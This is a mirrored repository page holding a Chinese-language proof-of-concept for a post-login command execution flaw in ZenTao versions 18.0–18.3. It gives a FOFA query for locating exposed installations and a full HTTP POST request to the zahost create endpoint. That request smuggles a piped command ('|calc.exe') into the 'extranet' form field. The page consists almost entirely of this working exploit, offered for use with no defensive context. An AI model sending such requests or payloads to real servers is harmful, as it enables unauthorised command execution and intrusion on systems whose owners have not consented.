admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 11:26:58 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/禅道/禅道-v18.0-v18.3-存在后台命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

36 lines
1.2 KiB
Markdown
Raw Blame History

## 禅道 v18.0-v18.3 存在后台命令执行漏洞
禅道后台存在 RCE 漏洞,存在于 V18.0-18.3 之间,经过复现分析,发现漏洞来源于新增加的一个功能模块。
## fofa
```
app="易软天创-禅道系统"
```
## poc
```
POST /zentaopms/www/index.php?m=zahost&f=create HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64;rv:109.0)Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/zentaopms/www/index.php?m=zahost&f=create
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 134
Origin: http://xxx.xxx.xxx.xxx
Connection: close
Cookie: zentaosid=fwaf16g51w678678qw686;
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
vsoft=kvm&hostType=physical&name=penson&extranet=xxx.xxx.xxx.xxx%7Ccalc.exe&cpuCores=
2&memory=16&diskSize=16&desc=&uid=640be59da4851&type=z
```
![image-20240615214003637](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406152140793.png)
Reference in New Issue View Git Blame Copy Permalink